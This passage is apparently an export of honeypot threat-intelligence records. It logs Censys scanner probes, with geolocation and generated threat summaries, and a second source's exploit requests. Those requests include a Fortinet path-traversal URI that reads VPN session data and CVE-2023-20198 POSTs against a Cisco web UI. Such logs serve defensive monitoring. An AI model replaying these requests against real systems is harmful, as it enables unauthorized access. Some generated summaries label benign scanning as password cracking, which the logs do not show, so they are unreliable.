    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_SMTP_H19&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_MYSQL_H2&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_IPP_H17&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_LDAP_H4&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_SIP_H14&amp;&amp;SMA-LAB_HTTP_H31&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_POSTGRES_H38&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_MYSQL_H11&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_SIP_H5&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_REDIS_H3&amp;&amp;SMA-LAB_SMTP_H36&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_ORACLE_H4&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_MYSQL_H4&amp;&amp;SMA-LAB_IPP_H15&amp;&amp;SMA-LAB_POP3_H26&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_SIP_H2&amp;&amp;SMA-LAB_IRC_H36&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_POP3_H36&amp;&amp;SMA-LAB_IRC_H39&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_SIP_H32&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;SMA-LAB_POSTGRES_H36&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_MYSQL_H37&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_IPP_H28&amp;&amp;SMA-LAB_SMTP_H16&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_IRC_HC1&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_SMTP_H34&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_SIP_H16&amp;&amp;SMA-LAB_SMTP_H24&amp;&amp;SMA-LAB_SIP_H20&amp;&amp;SMA-LAB_IPP_H18&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_POP3_H27&amp;&amp;SMA-LAB_RDP_H18&amp;&amp;SMA-LAB_IRC_H38&amp;&amp;SMA-LAB_SMTP_H5&amp;&amp;SMA-LAB_LDAP_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;41062&amp;&amp;25&amp;&amp;1521&amp;&amp;3306&amp;&amp;143&amp;&amp;1080&amp;&amp;110&amp;&amp;5900&amp;&amp;445&amp;&amp;1433&amp;&amp;631&amp;&amp;NA&amp;&amp;23&amp;&amp;443&amp;&amp;389&amp;&amp;54213&amp;&amp;5432&amp;&amp;6379&amp;&amp;6667&amp;&amp;3389&amp;&amp;53482&amp;&amp;21&amp;&amp;38724&amp;&amp;38726&amp;&amp;9100&amp;&amp;36976&amp;&amp;36166&amp;&amp;60614&amp;&amp;41346&amp;&amp;41366"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="108"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MI"/>
    <s v="Michigan"/>
    <s v="Washtenaw"/>
    <s v="Ann Arbor (Old West Side)"/>
    <s v="4984247"/>
    <s v="48104"/>
    <s v="42.2809"/>
    <s v="-83.7489"/>
    <s v="398324"/>
    <s v="Censys, Inc."/>
    <s v="Censys, Inc."/>
    <s v="hosting"/>
    <s v="Censys, Inc"/>
    <s v="2021-09-13"/>
    <s v="CENSY"/>
    <s v="2024-03-29"/>
    <s v="connection&amp;&amp;login&amp;&amp;request&amp;&amp;command&amp;&amp;NA&amp;&amp;query&amp;&amp;GET&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_ORACLE:{'local_user': 'None', 'program': 'zgrab2', 'service_name': 'None'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=35473'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '5.182.38.84:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '38.54.116.162:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.116.162:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.181.21.224:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.181.21.224:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.60.171.39:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.171.39:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.183,50782)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '156.244.37.11:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://156.244.37.11:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_HTTPS:{'Host': '38.54.116.162:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.116.162', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.116.162', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.253.40.123:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.253.40.123:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '94.131.8.76:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.8.76:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.183,37810)}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}&amp;&amp;{Data_HTTPS:{'Host': '154.26.156.60:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=54092'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=44259'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=56119'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 149.102.153.168:9100_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '|8e x08 /00IDED_x000d_'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.183,54214)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=58333'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=48194'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.183,59316)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '38.60.224.106:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.224.106:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '94.131.97.67:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.97.67:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '194.233.76.135:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.233.76.135:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=47748'}}&amp;&amp;{Data_HTTPS:{'Host': '94.131.8.76:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'x01_x000a_'}}&amp;&amp;{Data_PJL:{'command': 'x02lp_x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=52347'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 103.113.68.70:9100_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '5.180.55.39:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.180.55.39:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=36583'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.183,50810)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '154.93.37.45:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '193.57.136.113:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a75e:8ab7"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;High"/>
    <s v="The attacker is attempting to scan and exploit various services on the network, including FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, SIP, SMB, SMTP, SNMP, and others. They are using common attacks such as brute-force login attempts, password cracking, scanning for open ports, and exploiting vulnerabilities to gain unauthorized access. &amp;&amp; An attacker is attempting to authenticate using TLS encryption with the FTP service. This could be an initial step for a potential exploitation or data exfiltration attempt. The use of TLS may indicate the attacker's intention to establish a secure connection for malicious activities. &amp;&amp; The data suggests an attempt to use FTP encryption, possibly indicating a malicious actor trying to establish secure communication for unauthorized access. This could be part of a brute-force login attempt or a reconnaissance phase. It may also indicate the actor is using a proxy or anonymization service. &amp;&amp; This indicates an attempt to access PostgreSQL database services, which may be a sign of unauthorized database scanning or exploitation. The actor is likely probing the system for vulnerabilities or attempting to gain unauthorized access. This could potentially lead to further malicious activities such as data theft or compromise. &amp;&amp; This log suggests that there was an attempt to access FTP services but did not provide any data, indicating potentially malicious probing or scanning activity. The lack of provided data could indicate the attacker is gathering information for a future attack. This behavior may be indicative of reconnaissance efforts. &amp;&amp; No FTP connection was made. This indicates that an attacker did not attempt to establish a malicious FTP session. Activity was likely suppressed or prevented. &amp;&amp; A POST request was made to a printer service, indicating potential unauthorized access or scanning activity. The User-Agent indicates it is likely a scanner or crawler from CensysInspect. This could be related to reconnaissance or exploitation of network services. &amp;&amp; Someone is attempting to send a POST request with a large payload to a printer or print server at IP address 193.57.136.113, potentially trying to exploit vulnerabilities in the device's IPP service. This could be an attack aimed at spreading malware through the network by exploiting unpatched devices. The user agent indicates this may be a scanning activity by a security tool."/>
    <s v="**Password Cracking Attack** &amp;&amp; SMB Scanning &amp;&amp; FTP Attack &amp;&amp; FTP Auth &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="394"/>
    <x v="394"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:12:49"/>
    <d v="2024-12-06T01:29:05"/>
    <d v="2025-04-29T18:12:49"/>
    <n v="159"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTPS_H19"/>
    <s v="445&amp;&amp;1080&amp;&amp;21&amp;&amp;443&amp;&amp;8443&amp;&amp;80&amp;&amp;23&amp;&amp;58426&amp;&amp;58410&amp;&amp;NA&amp;&amp;56892"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3676"/>
    <s v="4.90414"/>
    <s v="202425"/>
    <s v="IP Volume inc"/>
    <s v="Quasi Networks LTD"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;POST&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Connection': 'close', 'Host': '38.54.117.64:443', 'User-Agent': 'Python-urllib/3.8', 'method': 'GET', 'uri': '/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '735', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '38.54.117.64', 'User-Agent': 'CVE-2023-20198', 'method': 'POST', 'uri': '/%2577eb%2575i_%2577sma_Http'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '735', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '154.26.156.60', 'User-Agent': 'CVE-2023-20198', 'method': 'POST', 'uri': '/%2577eb%2575i_%2577sma_Http'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '735', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '109.123.229.33', 'User-Agent': 'CVE-2023-20198', 'method': 'POST', 'uri': '/%2577eb%2575i_%2577sma_Http'}}&amp;&amp;{Data_HTTPS:{'Connection': 'TE, close', 'Host': '154.26.156.60:443', 'TE': 'deflate,gzip;q=0.3', 'User-Agent': 'libwww-perl/6.05', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Connection': 'TE, close', 'Host': '154.26.156.60:80', 'TE': 'deflate,gzip;q=0.3', 